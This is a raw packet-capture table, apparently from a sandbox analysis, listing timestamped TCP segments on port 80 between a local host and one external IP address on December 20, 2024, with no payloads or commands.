Dec 20, 2024 16:33:09.458323002 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.458368063 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.459037066 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.459078074 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.460036039 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.460077047 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.460325956 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.460951090 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.461750031 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.461798906 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.461870909 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.461906910 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.463346004 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.463388920 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.463593960 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.463630915 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.465008020 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.465046883 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.465221882 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.465265036 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.466708899 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.466754913 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.466766119 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.467076063 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.468388081 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.468442917 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.468764067 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.468880892 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.470030069 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.470069885 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.470192909 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.470233917 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.471934080 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.471970081 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.472112894 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.472280979 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.473393917 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.473436117 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.473478079 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.473690987 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.475059032 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.475101948 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.475464106 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.475502014 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.578389883 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.578455925 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.578516006 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.578558922 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.579144001 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.579186916 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.579298973 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.579332113 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.580650091 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.580744982 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.580780983 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.581963062 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.582005024 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.582051039 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.582725048 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.583425999 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.583611965 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.583687067 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.583719015 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.584825993 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.585037947 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.585071087 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.585926056 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.585967064 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.586013079 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.586173058 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.587215900 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.587254047 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.587795019 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.587831020 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.588510990 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.588656902 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.588674068 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.588696003 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.589823008 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.589869976 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.590193987 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.590234995 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.591128111 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.591166973 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.591372967 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.591408014 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.592355967 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.592442989 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.592473984 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.593631983 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.593791008 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.593816042 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.593825102 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.594882011 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.595065117 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.595088005 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.595098972 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.596223116 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.596235991 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.596260071 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.596276045 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.597321033 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.597414970 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.597455025 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.597486019 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.598594904 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.598635912 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.599121094 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.599157095 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.599838018 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.599878073 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.600106001 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.600158930 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.600950003 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.601139069 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.601326942 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.602094889 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.602143049 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.602175951 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.602356911 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.602418900 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.603353024 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.603388071 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.604389906 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.604463100 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.604567051 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.604578972 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.604610920 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.605736017 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.605779886 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.605936050 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.606004000 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.607069969 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.607106924 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.607783079 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.607898951 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.608227968 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.608268976 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.608278036 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.608309984 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.609400988 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.609412909 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.609472990 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.609472990 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.610527039 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.610575914 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.610620975 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.610850096 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.613253117 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.613289118 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.613327026 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.613337994 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.613359928 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.613375902 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.613857031 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.614031076 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.614069939 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.614245892 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.614298105 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.615335941 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.615372896 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.615408897 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.615441084 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.616486073 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.616524935 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.616633892 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.616667986 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.617664099 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.617702961 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.617753029 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.617785931 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.618859053 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.618896008 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.618932009 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.619123936 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.620060921 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.620105982 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.620138884 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.620286942 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.621335030 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.621373892 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.621536016 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.621582031 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.622380018 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.622469902 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.622493029 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.622541904 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.623615980 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.623653889 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.623738050 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.623796940 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.624820948 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.624891996 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.625013113 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.625078917 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.625957012 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.626013994 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.626100063 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.626308918 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.627223015 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.627270937 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.627398968 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.627433062 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.628268957 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.628309011 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.628361940 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.628395081 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.632046938 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.632098913 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.632132053 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.632143021 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.632175922 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.632488012 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.632498980 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.632510900 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.632525921 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.632551908 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.633740902 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.633753061 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.633775949 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.633790016 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.634185076 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.634223938 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.634424925 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.634458065 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.635422945 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.635435104 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.635468006 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.636581898 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.636617899 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.637207985 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.637248993 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.637708902 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.637748957 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.637876987 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.637917042 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.638982058 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.639028072 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.639168024 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.639235973 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.640302896 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.640572071 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.640588045 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.640630960 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.641347885 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.641388893 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.641513109 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.641549110 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.642469883 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.642513037 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.771615982 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.771678925 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.773309946 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.773323059 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.773334980 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.773346901 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.773359060 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.773381948 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.773406029 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.773452997 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.773475885 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.773494959 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.773504972 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.773828030 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.773901939 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.774504900 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.774517059 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.774552107 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.774561882 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.776067972 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.776112080 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.776115894 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.776153088 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.776957989 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.776997089 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.777040005 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.777710915 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.777767897 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.778017044 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.778070927 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.779438019 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.779540062 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.780747890 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.780760050 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.780771017 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.780797958 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.780819893 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.780965090 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.781006098 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.781053066 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.781130075 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.782027006 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.782099962 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.782113075 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.782152891 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.783107996 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.783188105 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.783224106 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.783325911 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.784205914 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.784266949 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.784327030 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.784586906 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.785295963 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.785345078 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.785481930 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.785644054 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.786412001 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.786458969 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.786802053 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.786847115 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.787642956 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.787708998 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.787754059 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.791094065 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.791105986 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.791117907 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.791131020 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.791143894 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.791156054 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.791160107 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.791188002 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.791217089 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.791462898 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.791532993 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.792265892 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.792313099 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.792390108 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.792434931 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.793219090 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.793257952 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.793507099 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.793551922 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.794156075 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.794200897 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.794205904 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.794239998 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.795902967 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:09.795978069 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:09.796575069 CET	80	49881	185.156.73.23	192.168.2.6
